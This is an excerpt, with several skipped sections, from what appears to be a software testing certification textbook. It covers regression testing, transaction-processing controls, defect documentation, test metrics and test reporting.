The process for using test data as illustrated in Figure 8-1 is:
Maintenance – The test data will require maintenance for a variety of reasons. Reasons might
include: remove obsolete data, update to align with current version, additional functionality to
test, and correction of errors found in test data.
Destruction – At some point, the test data will no longer be of use. Appropriate deletion of
the test data after archiving should be consistent with the security concerns of data.
The ISO 29119’s part 3 provides standard templates for test documentation that cover the
entire software testing life cycle. For more information on the ISO 29119 standard visit
www.softwaretestingstandard.org.
The more detailed the test plan, the easier this task becomes for the individuals responsible for
performing the test. The test plan (Skill Category 5) should have been updated throughout the
project in response to approved changes made to the application specifications or other project
constraints (i.e., resources, schedule). This process ensures that the true expected results have
been documented for each planned test.
The roles and responsibilities for each stage of testing should also have been documented in
the test plan. For example, the development team (programmers) might be responsible for unit
testing in the development environment, while the test team is responsible for integration and
system testing in the test environment.
The Test Manager is responsible for conducting the Test Readiness Review prior to the start of
testing. The purpose of this review is to ensure that all of the entrance criteria for the test
phase have been met, and that all test preparations are complete.
The test plan should contain the procedures, environment, and tools necessary to implement
an orderly, controlled process for test execution, defect tracking, coordination of rework, and
configuration and change control. This is where all of the work involved in planning and set-
up pays off.
For each phase of testing, the planned tests are performed and the actual results are compared
to the documented expected results. When an individual performs a test script, they should be
aware of the conditions under test, the general test objectives, as well as specific objectives
listed for the script. All tests performed should be logged in a test management tool (or in a
manual log if not using a tool) by the individual performing the test.
The Test Log (manual or automated) records test activities in order to maintain control over
the test. It includes the test ID, test activities, start and stop times, pass or fail results, and
comments. Be sure to document actual results. Log the incidents into the defect tracking
system once a review determines it is actually a defect.
The IEEE 829 provides a standard for Software Test Documentation which defines the Test
Log as a chronological record of relevant details about the execution of test cases. The IEEE
template contents include: 1) Test Log Identifier; 2) Description; and 3) Activity and Event
Entries.
When the development team communicates the defect resolution back to the test team, and the
fix is migrated to the test environment, the problem is ready for retest and execution of any
regression testing associated with the fix.
Regression, to relapse to a less perfect state, in section 1.10.1 of Skill Category 1 described
regression testing this way:
Regression testing is not a separate phase of testing, and is not maintenance testing.
Regression testing must occur whenever changes to tested units, environments, or procedures
occur. For that reason the discussion about regression testing processes happens now before
detailed discussion about unit, integration and system testing. Unfortunately, regression
testing is often inadequate in organizations and poses a significant risk to an application.
Regression testing can be one of the most challenging testing processes within an organization
because testers are looking for defects in applications that have already passed in previous test
cycles.
Regression testing will happen throughout the life cycle and for that reason a regression
testing approach will vary depending on at what stage it is conducted. Shown here is an
example of a regression test process which carefully introduces changes on the test side so not
to mask off defects or allow defects to be injected into our test suite.
An eight-step process can be used to perform regression testing. As a prerequisite, the
assumption is that a complete set of test cases and test data (TS1) exists that thoroughly
exercises the current unchanged version of the software (V1). The following steps show the
process (see Figure 8-2):
Step 1 – Change is introduced into the application system V1 which creates V2 of the
application.
Step 2 – Test the changed software V2 against the unchanged test cases and test data TS1. The
objective is to show that unchanged sections of the software continue to produce the same
results as they did in version 1. If this is done manually, testing the changed portions of the
system can be bypassed. If an automated tool is used, running TS1 against the V2 may
produce totally invalid results. These should be disregarded. Only the unchanged portions are
evaluated here.
Step 3 – Create an updated version of the test cases and test data (TS2) by removing tests that
are no longer needed due to changes in the system.
Step 4 – Run test of TS2 against V2. This not only tests the changed portions, but provides
another regression test of the unchanged portions. By creating the clean TS2 it prevents the
tester from introducing errors in the form of new tests and test data added to test suite.
Step 5 – Create TS3 which is new cases and data designed to exercise just the new
functionality.
Step 6 – Run test of TS3 against V2. This tests new functionality only but more importantly it
tests the tests with little interaction or impact from other test suite (TS2).
Step 7 – Combine TS2 and TS3 to create a full test suite of all cases and data (TS4) necessary
to thoroughly exercise the entire system (V2).
To perform selective regression testing, each change must be analyzed and the impact on other
system components assessed. A process for analyzing changes is:
• Identify each changes component. A component may be a SCREEN, REPORT, DATA
ELEMENT, DATA-FLOW PROCESS, etc.
• Identify the nature of the change and its relationship to other affected components. Use
of data flow diagrams, case repositories, or other tools which cross-reference or relate
components is helpful.
• If the changes are “local” (i.e., processes, data flows, and I/Os), then only the
unchanged portions of those components need to be regression tested.
• If the changes are “global” (i.e., existing, new, deleted data elements, data element
rules, values/validation, data store layouts, global variables, table contents, etc.), then
all components related to those components must be regression tested.
There is no universal definition of a unit; it depends on the technologies and scope of work. A
unit can be:
• On program module
• One function/feature
• In Object-Oriented:
A Class or
The functionality implemented by a method
• A window or elements of a window
• A web page
• A Java applet or servlet
• An Active Server Page (ASP)
• A Dynamic Link Library (DLL) object
• A Common Gateway Interface (CGI) script
Ideally, the developer is in the best position to perform unit testing. The developer can to test
both function and structure and from a dynamic testing point of view unit testing is the earliest
opportunity to test.
However, there are challenges for developers. Often developers lack of objectivity because
they are so closely tied to the code. Also, pressures of meeting extremely tight schedules, a
lack of training for developers in test techniques, and few if any processes, environment or
tools for testing cause issues. John Dodson, manager of software engineering at Lockheed
Martin stated that, “Most of the college folks I get have a real good background in building
software and a horrible background in testing it.”
The procedural flow of unit testing is not dissimilar from other testing phases. It is what is
tested that differs. The majority of white-box testing techniques discussed in section 7.4.1
(e.g., statement testing) are used most often in unit testing.
Other concerns the development team must consider as part of the development, unit test, and
fix process is Software Entropy. That is the tendency for software, over time, to become
difficult and costly to maintain. It is by the very nature of software that systems tend to
undergo continuous change resulting in systems that become more complex and disorganized.
Software refactoring is the process of improving the design of existing software code.
Refactoring doesn't change the observable behavior of the software; it improves its internal
structure. For example, if a programmer wants to add new functionality to a program, they
may decide to refactor the program first to simplify the addition of new functionality and to
prevent software entropy.
The top down approach requires stubs for each lower component and only one “top level”
driver is needed. Stubs can be difficult to develop and may require changes for different test
cases.
The bottom up approach begins with the components with the fewest dependencies. A driver
causes the component under test to exercise the interfaces. As you move up the drivers are
replaced with the actual components.
• When a defect is fixed and migrated to the test environment, re-test and validate the
fix. If the defect is fixed, close the defect. If the defect is not fixed, return it to the
developer for additional work.
The system test focuses on determining whether the requirements have been implemented
correctly. This includes verifying that users can respond appropriately to events such as
month-end processing, year-end processing, business holidays, promotional events,
transaction processing, error conditions, etc.
In web and mobile testing, the test team must also prove that the application runs successfully
on all supported hardware and software environments. This can be very complex with
applications that must also support various web browsers and mobile devices.
COTS software is normally developed prior to an organization selecting that software for its
use. For smaller, less expensive software packages the software is normally “shrink wrapped”
and is purchased as is. As the COTS software becomes larger and more expensive, the
contracting organization may be able to specify modifications to the software.
On most software test projects the probability of everything going exactly as planned is small.
Scope creep, development delays, and other intervening events may require that the test plan
be updated during the test execution process to keep the plan aligned with the reality of the
project. This contingency would have been planned for in the test plan. Regardless of why a
change is necessary what is critical is that the impact on project risk be identified and
documented and that all stakeholders sign-off on the changes.
Auditors state that without strong environmental controls the transaction processing controls
may not be effective. For example, if passwords needed to access computer systems (a
transactional control) are not adequately protected (environmental control) the password
system will not work. Individuals will either protect or not protect their password based on
environmental controls such as the attention management pays to password protection, the
monitoring of the use of passwords that exist, and management’s actions regarding individual
worker’s failure to protect passwords.
Two examples of management controls are the review and approval of a new system and
limiting computer room access.
• Review and Approval of a New System
This control should be exercised to ensure management properly reviews and
approves new IT systems and conversion plans. This review team examines
requests for action, arrives at decisions, resolves conflicts, and monitors the
development and implementation of system projects. It also oversees user
performance to determine whether objectives and benefits agreed to at the
beginning of a system development project are realized.
The team should establish guidelines for developing and implementing system
projects and define appropriate documentation for management summaries. They
Because these two systems are designed as a single system, most testers do not conceptualize
the two systems. Adding to the difficulty is that the system documentation is not divided into
the system that processes transactions and the system that controls the processing of
transactions.
When one visualizes a single system, one has difficulty in visualizing the total system of
control. For example, if one looks at edits of input data by themselves, it is difficult to see how
the totality of control over the processing of a transaction is implemented. For example, there
is a risk that invalid transactions will be processed. This risk occurs throughout the system and
not just during the editing of data. When the system of controls is designed it must address all
of the risks of invalid processing from the point that a transaction is entered into the system to
the point that the output deliverable is used for business purposes.
A point to keep in mind when designing tests of controls is that some input errors may be
acceptable if they do not cause an interruption in the application’s processing. A simple
example of this would be a misspelled description of an item. In deciding on controls, it is
necessary to compare the cost of correcting an error to the consequences of accepting it. Such
trade-offs must be determined for each application. Unfortunately there are no universal
guidelines available.
It is important that the responsibility for control over transaction processing be separated as
follows:
• Initiation and authorization of a transaction
• Recording of the transaction
• Custody of the resultant asset
In addition to safeguarding assets, this division of responsibilities provides for the efficiencies
derived from specialization, makes possible a cross-check that promotes accuracy without
duplication or wasted effort, and enhances the effectiveness of a management control system.
The objectives of transaction processing controls are to prevent, detect, or correct incorrect
processing. Preventive controls will stop incorrect processing from occurring; detective
controls identify incorrect processing; and corrective controls correct incorrect processing.
Since the potential for errors is always assumed to exist, the objectives of transaction
processing controls will be summarized in five positive statements:
• Assure that all authorized transactions are completely processed once and only once.
• Assure that transaction data is complete and accurate.
• Assure that transaction processing is correct and appropriate to the circumstances.
• Assure that processing results are utilized for the intended benefits.
• Assure that the application can continue to function.
In most instances controls can be related to multiple exposures. A single control can also
fulfill multiple control objectives. For these reasons transaction processing controls have been
classified according to whether they prevent, detect, or correct causes of exposure. The
controls listed in the next sections are not meant to be exhaustive but, rather, representative of
these types of controls.
Preventive controls act as a guide to help things happen as they should. This type of control is
most desirable because it stops problems from occurring. Application designers should put
their control emphasis on preventive controls. It is more economical and better for human
relations to prevent a problem from occurring than to detect and correct the problem after it
has occurred.
One question that may be raised is, “At what point in the processing flow is it most desirable
to exercise computer data edits?” The answer to this question is simply, “As soon as possible,
in order to uncover problems early and avoid unnecessary computer processing.”
Preventive controls are located throughout the entire application. Many of these controls are
executed prior to the data entering the program’s flow. The following preventive controls will
be discussed in this section:
• Data input
• Turn-around documents
• Pre-numbered forms
• Input validation
• Computer updating of files
• Controls over processing
Data Input - The data input process is typically a manual operation; control is needed to
ensure that the data input has been performed accurately.
Pre-Numbered Form - Sequential numbering of the input transaction with full accountability
at the point of document origin is another traditional control technique. This can be done by
using pre-numbered physical forms or by having the application issue sequential numbers.
Input Validation - An important segment of input processing is the validation of the input
itself. This is an extremely important process because it is really the last point in the input
preparation where errors can be detected before processing occurs. The primary control
techniques used to validate the data are associated with the editing capabilities of the
application. Editing involves the ability to inspect and accept (or reject) transactions
according to validity or reasonableness of quantities, amounts, codes, and other data contained
in input records. The editing ability of the application can be used to detect errors in input
preparation that have not been detected by other control techniques.
The editing ability of the application is achieved by installing checks in the program of
instructions, hence the term program checks. They include:
• Validity tests - Validity tests are used to ensure that transactions contain valid transaction
codes, valid characters, and valid field size.
• Completeness tests - Completeness checks are made to ensure that the input has the
prescribed amount of data in all data fields. For example, a particular payroll application
requires that each new employee hired have a unique User ID and password. A check may
also be included to see that all characters in a field are either numeric or alphabetic.
• Logical tests - Logical checks are used in transactions where various portions, or fields, of
the record bear some logical relationship to one another. An application can check these
logical relationships to reject combinations that are erroneous even though the individual
values are acceptable.
• Limit tests - Limit tests are used to test record fields to see whether certain predetermined
limits have been exceeded. Generally, reasonable time, price, and volume conditions can be
associated with a business event.
• Self-checking digits - Self-checking digits are used to ensure the accuracy of
identification numbers such as credit card numbers. A check digit is determined by
performing some arithmetic operation on the identification number itself. The arithmetic
operation is formed in such a way that typical errors encountered in transcribing a number
(such as transposing two digits) will be detected.
• Control totals - Control totals serve as a check on the completeness of the transaction
being processed. Control totals are normally obtained from batches of input data. For
example, daily batch control totals may be emailed to a company allowing them to cross
check with the credit card receipts for that day.
Computer Updating of Files - The updating phase of the processing cycle entails the
computer updating files with the validated transactions. Normally computer updating involves
sequencing transactions, comparing transaction records with master-file records,
computations, and manipulating and reformatting data, for the purpose of updating master
files and producing output data for distribution to user departments for subsequent processing.
Controls over Processing - When we discussed input validation, we saw that programmed
controls are a very important part of application control. Programmed controls in computer
updating of files are also very important since they are designed to detect loss of data, check
arithmetic computation, and ensure the proper posting of transactions.
Detective controls alert individuals involved in a process so that they are aware of a problem.
Detective controls should bring potential problems to the attention of individuals so that
action can be taken. One example of a detective control is a listing of all time cards for
individuals who worked over 40 hours in a week. Such a transaction may be correct, or it may
be a systems error, or even fraud.
Detective controls will not prevent problems from occurring, but rather will point out a
problem once it has occurred. Examples of detective controls are batch control documents,
batch serial numbers, clearing accounts, labeling, and so forth.
• Control totals
• Control register
• Documentation and testing
• Output Checks
Control totals - Control totals are normally obtained from batches of input data. These
control totals are prepared manually, prior to processing, and then are incorporated as input to
the data input process. The application can accumulate control totals internally and make a
comparison with those provided as input. A message confirming the comparison should be
printed out, even if the comparison did not disclose an error. These messages are then
reviewed by the respective control group.
Control Register - Another technique to ensure the transmission of data is the recording of
control totals in a log so that the input processing control group can reconcile the input
controls with any control totals generated in subsequent computer processing.
Output Checks - The output checks consist of procedures and control techniques to:
• Reconcile output data, particularly control totals, with previously established control
totals developed in the input phase of the processing cycle
• Review output data for reasonableness and proper format
• Control input data rejected by the computer during processing and distribute the
rejected data to appropriate personnel
Proper input controls and file-updating controls should give a high degree of assurance that
the output generated by the processing is correct. However, it is still useful to have certain
output controls to achieve the control objectives associated with the processing cycle.
Basically, the function of output controls is to determine that the processing does not include
any unauthorized alterations by the computer operations section and that the data is
substantially correct and reasonable.
It should be noted that the corrective process itself is subject to error. Many major problems
have occurred in organizations because corrective action was not taken on detected problems.
Therefore detective control should be applied to corrective controls. Examples of corrective
controls are: error detection and re-submission, audit trails, discrepancy reports, error
statistics, and backup and recovery. Error detection and re-submission, and audit trail controls
are discussed below.
• Error Detection and Re-submission - Until now we have talked about data control
techniques designed to screen the incoming data in order to reject any transactions that do
not appear valid, reasonable, complete, etc. Once these errors have been detected, we need
to establish specific control techniques to ensure that all corrections are made to the
transactions in error and that these corrected transactions are reentered into the system.
Such control techniques should include:
Having the control group enter all data rejected from the processing cycle in an
error log by marking off corrections in this log when these transactions are
reentered; open items should be investigated periodically.
Preparing an error input record or report explaining the reason for each rejected
item. This error report should be returned to the source department for correction
and re-submission. This means that the personnel in the originating or source
department should have instructions on the handling of any errors that might occur.
Submitting the corrected transactions through the same error detection and input
validation process as the original transaction.
• Audit Trail Controls - Another important aspect of the processing cycle is the audit trail.
The audit trail consists of documents, journals, ledgers, and worksheets that enable an
interested party (e.g., the auditor) to track an original transaction forward to a summarized
total or from a summarized total backward to the original transaction. Only in this way can
they determine whether the summary accurately reflects the business’s transactions.
In an application system there is a cost associated with each control. The cost of these controls
needs to be evaluated as no control should cost more than the potential errors it is established
to detect, prevent, or correct. Also, if controls are poorly designed or excessive, they become
burdensome and may not be used. The failure to use controls is a key element leading to major
risk exposures.
Preventive controls are generally the lowest in cost. Detective controls usually require some
moderate operating expense. On the other hand, corrective controls are almost always quite
expensive. Prior to installing any control, a cost/benefit analysis should be made. Controls
need to be reviewed continually.
A well-developed defect statement will include each of these attributes. When one or more of
these attributes is missing, questions usually arise, such as:
• Criteria – Why is the current state inadequate?
• Effect – How significant is it?
• Cause – What could have caused the problem?
The documenting of deviation is describing the conditions, as they currently exist, and the
criteria, which represents what the user desires. The actual deviation will be the difference or
gap between “what is” and “what is desired.”
The statement of condition is uncovering and documenting the facts, as they exist. What is a
fact? If somebody tells you something happened, is that “something” a fact? On the other
hand, is it only a fact if someone told you it’s a fact? The description of the statement of
condition will of course depend largely on the nature and extent of the evidence or support
that is examined and noted. For those facts making up the statement of condition, the IT
professional will obviously take pains to be sure that the information is accurate, well
supported, and worded as clearly and precisely as possible.
• Inputs – The triggers, events, or documents that cause this activity to be executed.
• User/Customers served – The organization, individuals, or class users/customers
serviced by this activity.
• Deficiencies noted – The status of the results of executing this activity and any
appropriate interpretation of those facts.
Table 8-1 is an example of the types of information that should be documented to describe the
defect and document the statement of condition and the statement of criteria. Note that an
additional item could be added to describe the deviation.
Efficiency, economy, and effectiveness are useful measures of effect and frequently can be
stated in quantitative terms such as dollars, time, and units of production, number of
procedures and processes, or transactions. Where past effects cannot be ascertained, potential
future effects may be presented. Sometimes, effects are intangible, but nevertheless of major
significance.
In thought processes, effect is frequently considered almost simultaneously with the first two
attributes of the defect. Testers may suspect a bad effect even before they have clearly
formulated these other attributes in their minds. After the statement of condition is identified
the tester may search for a firm criterion against which to measure the suspected effect.
The tester should attempt to quantify the effect of a defect wherever practical. While the effect
can be stated in narrative or qualitative terms, that frequently does not convey the appropriate
message to management; for example, statements like “Service will be delayed,” do not really
tell what is happening to the organization.
The determination of the cause of a condition usually requires the scientific approach, which
encompasses the following steps:
Step 1. Define the defect (the condition that results in the finding).
Step 2. Identify the flow of work and information leading to the condition.
Step 3. Identify the procedures used in producing the condition.
Step 4. Identify the people involved.
Step 5. Recreate the circumstances to identify the cause of a condition.
It is important to note that the individual whose results are being reported receive those results
prior to other parties. This has two advantages for the software tester. The first is that the
individual, whom testers believe may have made a defect, will have the opportunity to
confirm or reject that defect. Second it is important for building good relationships between
testers and developers to inform the developer who made the defect prior to submitting the
data to other parties. Should the other parties contact the developer in question prior to the
developer receiving the information from the tester, the developer would be put in a difficult
situation. It would also impair the developer-tester relationship.
This section also outlines an approach for defect management. This approach is a synthesis of
the best IT practices for defect management. It is way to explain a defect management process
within an organization.
Although the tester may not be responsible for the entire defect management process, they
need to understand all aspects of defect management. The defect management process
involves these general principles:
• The primary goal is to prevent defects. Where this is not possible or practical, the
goals are to both find the defect as quickly as possible and minimize the impact of the
defect.
• The defect management process, like the entire software development process, should
be risk driven. Strategies, priorities and resources should be based on an assessment of
the risk and the degree to which the expected impact of a risk can be reduced.
• Defect measurement should be integrated into the development process and be used by
the project team to improve the development process. In other words, information on
defects should be captured at the source as a natural by-product of doing the job. It
should not be done after the fact by people unrelated to the project or system.
• As much as possible, the capture and analysis of the information should be automated.
• Defect information should be used to improve the process. This, in fact, is the primary
reason for gathering defect information.
• Imperfect or flawed processes cause most defects. Thus, to prevent defects, the
process must be altered.
Name of the Defect - Name defects according to the phase in which the defect most likely
occurred such as, requirements defect, design defect, documentation defect, and so forth.
Defect Type - Indicates the cause of the defect. For example, code defects could be errors in
procedural logic, or code that does not satisfy requirements or deviates from standards.
Defect Class - The following defect categories are suggested for each phase:
• Missing - A specification was not included in the software.
• Wrong - A specification was improperly implemented in the software.
• Extra - An element in the software was not requested by a specification
If a requirement was not correct because it had not been described completely during the
requirements phase of development, the name of that defect using all 3 levels might be:
• Name – Requirement defect
• Severity – Minor
• Type - Procedural
• Class – Missing
9
Measurement, Test Status, and
Reporting
M
anagement expert Peter Drucker is often quoted as saying that “you can't manage
what you can't measure.” He extends that thought to “if you can’t measure it, you
can’t improve it.” To accomplish both the necessary management of the test project
and the continuous improvement of the test processes, it is important that the tester
understand what and how to collect measures, create metrics and use that data along with
other test results to develop effective test status reports. These reports should show the status
of the testing based on the test plan. Reporting should document what tests have been
performed and the status of those tests. Good test reporting practices are to utilize graphs,
charts, and other pictorial representations when appropriate to help the other project team
members and users interpret the data. The lessons learned from the test effort should be used
to improve the next iteration of the test process.
These are the test processes used by the test team (or other project team members) to perform
static testing. They include, but are not limited to:
• Inspections – A verification of process deliverables against deliverable specifications.
• Reviews – Verification that the process deliverables/phases are meeting the user’s true
needs.
These are the results from dynamic test techniques used by the test team to perform testing.
They include, but are not limited to:
• Functional test cases - The type of tests that will be conducted during the execution of
tests, which will be based on software requirements.
• Structural test cases - The type of tests that will be conducted during the execution of
test which will be based on validation of the design.
• Non-functional test cases - The type of tests that will be conducted during the
execution of tests which will validate the attributes of the software such as portability,
testability, maintainability, etc.
9.1.1.4 Defects
This category includes a description of the individual defects uncovered during testing.
9.1.1.5 Efficiency
As the Test Plan is being developed, the testers decompose requirements into lower and lower
levels. Conducting testing is normally a reverse of the test planning process. In other words,
testing begins at the very lowest level and the results are rolled up to the highest level. The
final Test Report determines whether the requirements were met. How well documenting,
analyzing, and rolling up test results proceeds depends partially on the process of
decomposing testing through to a detailed level. The roll-up is the exact reverse of the test
strategy and tactics. The efficiency of these processes should be measured.
Two types of efficiency can be evaluated during testing: efficiency of the software system and
efficiency of the test process. If included in the mission of software testing, the testers can
measure the efficiency of both developing and operating the software system. This can
involve simple metrics such as the cost to produce a function point of logic, complex metrics
using measurement software.
Measures can be either objective or subjective. An objective measure is a measure that can be
obtained by counting. For example, objective data is hard data, such as defects, hours worked,
and number of completed unit tests. Subjective data are not hard numbers but are generally
perceptions by a person of a product or activity. For example, a subjective measure would
involve such attributes as how easy it is to use and the skill level needed to execute the system.
Before a measure is approved for use, there are certain tests that it
must pass. Shown here are tests that each measure and metric Terminology
should be subjected to before it is approved for use:
Reliability
Reliability Validity
This refers to the consistency of measurement. If taken by two Ease of Use and
people, would the same results be obtained? Simplicity
Validity Timeliness
Timeliness
This refers to whether the data was reported in sufficient time to impact the decisions
needed to manage effectively.
Calibration
This indicates the movement of a measure so it becomes more valid, for example,
changing a customer survey so it better reflects the true opinions of the customer.
A measure is a single attribute of an entity. It is the basic building block for a measurement
program. Measurement cannot be used effectively until the standard units of measure have
been defined. You cannot intelligently talk about lines of code until the measure lines of code
has been defined. For example, lines of code may mean lines of code written, executable lines
of code written, or even non-compound lines of code written. If a line of code was written that
contained a compound statement, such as a nested IF statement two levels deep, it would be
counted as two or more lines of code.
There are two ways in which quality can drive productivity. The first, and undesirable method,
is to lower or not meet quality standards. For example, if one chose to eliminate the testing
and rework components of a system development process, productivity as measured in lines
of code per hours worked would be increased. This is sometimes done on development
projects under the guise of completing projects on time. While testing and rework may not be
eliminated, they are not complete when the project is placed into production. The second
method for improving productivity through quality is to improve processes so that defects do
not occur, thus minimizing the need for testing and rework.
While there are no generally accepted categories of measures and metrics, it has proved
helpful to many test organizations to establish categories for status and reporting purposes.
In examining many reports prepared by testers the following categories are commonly used:
• Measures unique to test
• Metrics unique to test
• Complexity measurements
• Project metrics
• Size measurements
• Satisfaction metrics
• Productivity metrics
This category includes the basic measures collected during the test process including defect
measures. The following are examples of measures unique to test. Note that all measurements
collected for analysis would be collected using a standardized time frame (e.g., test cycle, test
phase, sprint). Also, time is often referenced in terms of days but could be a different time
factor (e.g., hour, minutes, 10ths of an hour):
• Number of test cases – The number of unique test cases selected for execution.
• Number of test cases executed – The number of unique test cases executed, not
including re-execution of individual test cases.
• Number of test cases passed – The number of unique test cases that currently meet all
the test criteria.
• Number of test cases failed – The number of unique test cases that currently fail to
meet the test criteria.
• Number of test cases blocked The number of distinct test cases that have not been
executed during the testing effort due to an application, configuration, or
environmental constraint.
• Number of test cases re-executed – The number of unique test cases that were re-
executed, regardless of the number of times they were re-executed.
• Total executions The total number of test case executions including test re-
executions.
• Total number of test cases passes The total number of test case passes, including re-
executions of the same test case.
• Total failures The total number of test case failures, including re-executions of the
same test case.
• Number of first run failures The total number of test cases that failed on the first
execution.
• Number of defects found (in testing) – The number of defects uncovered in testing.
• Number of defects found by severity – The number of defects as categorized by
severity (e.g., critical, high, medium, low)
• Number of defects fixed – The number of reported defects that have been corrected
and the correction validated in testing.
• Number of open defects – The number of reported defects that have not been corrected
or the correction has not been validated in testing.
• Number of defects found post-testing – The number of defects found after the
application under test has left the test phase. Typically this would be defects found in
production.
• Defect age – The number of days since the defect was reported.
• Defect aging – The number of days open (defect closed date – defect open date).
• Defect fix time retest – The number of days between the date a corrected defect is
released in the new build and the date the defect is retested.
• Person days – The number of person days expended in the test effort
• Number of test cycles – The number of testing cycles required to complete testing.
• Number of requirements tested – The total number of requirements tested.
• Number of passed requirements Number of requirements meeting success criteria.
This category includes metrics that are unique to test. Most are computed from the measures
listed in section 9.1.3.5.1. The metrics are (note the / represents divided by):
• Percent complete – Number of test cases passed / total number of test cases to be
executed.
• Test case coverage – Number of test cases executed / total number of test cases to be
executed.
• Test pass rate – Number of test cases passed / number of test cases executed.
• Test failure rate – Number of test cases failed / number of test cases executed.
• Tests blocked rate – Number of test cases blocked / total test cases
• First run failure rate – Number of first run failures / number of test cases executed.
• Percent defects corrected – Number of closed defects / total number of defects
reported
• Percent rework – (Number of total executions – number of test cases executed) /
number of test cases executed
• Percent bad fixes – (Total failures – first run failures) / first run failures
• Defect discovery rate – Total defects found / person days of test effort
• Defect removal efficiency – Total defects found in testing / (total defects found in
testing + number of defects found post-testing).
• Defect density – Total defects found / standard size measure of application under test
(size measure could be KLOCs, Function points, Story Points)
• Requirements Test Coverage – Number of requirements tested / total number of
requirements
This category comprises the status of the project including milestones, budget and schedule
variance and project scope changes. The following are examples of project metrics:
• Percent of budget utilized
• Days behind or ahead of schedule
• Percent of change of project scope
• Percent of project completed (not a budget or schedule metric, but rather an
assessment of the functionality/structure completed at a given point in time)
This category includes methods primarily developed for measuring the size of software
systems, such as lines of code, and function points. These can also be used to measure
software testing productivity. Sizing is important in normalizing data for comparison to other
projects. The following are examples of size metrics:
• KLOC – thousand lines of code; used primarily with statement level languages.
• Function points (FP) – a defined unit of size for software.
• Pages or words of documentation
This category includes the assessment of customers of testing on the effectiveness and
efficiency of testing. The following are examples of satisfaction metrics:
• Ease of use – the amount of effort required to use software and/or software
documentation.
• Customer complaints – some relationship between customer complaints and size of
system or number of transactions processed.
• Customer subjective assessment – a rating system that asks customers to rate their
satisfaction on different project characteristics on a scale.
• Acceptance criteria met – the number of user defined acceptance criteria met at the
time software goes operational.
• User participation in software development – an indication of the user desire to
produce high quality software on time and within budget.
This category includes the effectiveness of test execution. Examples of productivity metrics
are:
• Cost of testing in relation to overall project costs – assumes a commonly accepted
ratio of the costs of development versus tests.
• Under budget/Ahead of schedule.
• Software defects uncovered after the software is placed into an operational status
(measure).
Experience has shown the analysis and reporting of defects and other software attributes is
enhanced when those involved are given analysis and reporting tools. Software quality
professionals have recognized the following tools as the more important analysis tools used
by software testers. Some of these analytical tools are built into test automation tool packages.
For each tool the deployment, or how to use, is described, as well as examples, results, and
recommendations.
9.2.1 Histograms
A histogram is an orderly technique of grouping data by
Terminology predetermined intervals to show the frequency of the data set. It
provides a way to measure and analyze data collected about a
Histograms process or problem. Pareto charts are a special use of a histogram.
When sufficient data on a process is available, a histogram displays
the process central point (average), variation (standard deviation, range) and shape of
distribution (normal, skewed, and clustered).
A Pareto chart can be used when data is available or can be readily collected from a process.
The use of this tool occurs early in the continuous improvement process when there is a need
to order or rank, by frequency, problems and causes. Team(s) can focus on the vital few
problems and the root causes contributing to these problems. This technique provides the
ability to:
• Categorize items, usually by content or cause factors.
Content: type of defect, place, position, process, time, etc.
Cause: materials, machinery or equipment, operating methods, manpower,
measurements, etc.
• Identify the causes and characteristics that most contribute to a problem.
• Decide which problem to solve or which basic causes of a problem to work on first.
Control charts are used to evaluate variation of a process to determine what improvements are
needed and are meant to be used on a continuous basis to monitor processes.
The test reports indicating the current status of reporting, or interim test reports are needed for
project management. Those responsible for making project decisions need to know the status
from the tester’s perspective throughout the project. These interim reports can occur in any
phase of the life cycle, at pre-defined checkpoints, or when important information needs to be
conveyed to developers.
The final test reports are prepared at the conclusion of each level of testing. The ones
occurring at the end of unit and integration testing are normally informal and have the primary
purpose of indicating that there are no remaining defects at the end of those test levels. The
test reports at the conclusion of system testing and acceptance testing are primarily for the
customer or user to make decisions regarding whether or not to place the software in
operation. If it is placed in operation with known defects, the user can develop strategies to
address potential weaknesses.
The test reports are designed to report the results of testing as defined in the Test Plan.
Without a well-developed Test Process, which has been executed in accordance with the plan,
it is difficult to develop a meaningful test report.
All final test reports should be designed to accomplish the following three objectives:
• Define the scope of testing – this is normally a brief recap of the Test Plan
• Present the results of testing
• Draw conclusions and recommendations from those test results
The final test report may be a combination of electronic data and printed information. For
example, if the Function Test Matrix is maintained electronically, there is no reason to print
that, as the detail is available electronically if needed. The printed final report will summarize
that data, draw the appropriate conclusions, and present recommendations.
• Provide information to the users of the software system so that they can determine
whether the system is ready for production; and if so, to assess the potential
consequences and initiate appropriate actions to minimize those consequences.
• After implementation, help the project trace problems in the event the application
malfunctions in production. Knowing which functions have been correctly tested and
which ones still contain defects can assist in taking corrective action.
• Use the test results to analyze the test process for the purpose of preventing similar
defects from occurring in the future. Accumulating the results of many test reports to
identify which components of the software development process are defect-prone
provides this historical data, improves the developmental process and, if improved,
could eliminate or minimize the occurrence of high-frequency defects.
There is no generally accepted standard regarding the type, content and frequency of test
reports. However, it is reasonable to assume that some type of report should be issued after the
conclusion of each test activity. This would include reports at the conclusion of these test
activities:
• Unit test
• Integration test
• System test
The individual who wrote the unit normally conducts unit testing. The objective is to assure
all the functions in the unit perform correctly, and the unit structure performs correctly. The
report should focus on what was tested, the test results, defects uncovered and, what defects
have not been corrected, plus the unit tester’s recommendations as to what should be done
prior to integration testing.
Skill Category 5, Test Planning, presented a system test plan standard that identified the
objectives of testing, what was to be tested, how it was to be tested, and when tests should
occur. The System Test Report should present the results of executing that Test Plan.
Figure 9-5 illustrates the test reporting standard that is based on the test plan standard.
scoring above the enterprise baseline can be used to improve those projects that are
marginal or fall below the enterprise baseline.
2. Use good report writing practices. The following are examples of good report writing:
• Allow project team members to review the draft and make comments before the report
is finalized.
• Don’t include names or assign blame.
• Stress quality.
• Limit the report to two or three pages stressing important items; include other
information in appendices and schedules.
• Eliminate small problems from the report and give these directly to the project people.
• Hand-carry the report to the project leader.
• Offer to have the testers work with the project team to explain their findings and
recommendations.
10
Testing Specialized
Technologies
T
he skill sets required by today’s software test professional in many ways mirror
Moore’s Law. Paraphrasing just a bit, Moore's law states that advances in technology
will double approximately every 18 to 24 months. While it is true that some testers on
legacy projects still test applications where the origin of the COBOL code may, in fact, stretch
back to 1965 when Gordon Moore, co-founder of INTEL, coined Moore’s Law, the reality is
the skill sets needed today are advancing rapidly and have become more and more specialized.
To be clear, calling something specialized does not mean that the discussions about life
cycles, test preparation, planning, test techniques, measurement, managing the project or
leading the team are different. Quite the contrary, regardless of the technology the majority of
the skills and tasks performed are applicable with the customization that any project might
require. What this section deals with is the added nuances that certain technologies require for
testing. Discussed here will be such things as testing web and mobile applications, testing
cloud based applications, Agile, security, and Dev Ops. For these the nature of the technology
and its impact on testing will be described.
As organizations acquire new technologies, new skills are required because test plans need to
be based on the types of technology used. Also technologies new to the organization and the
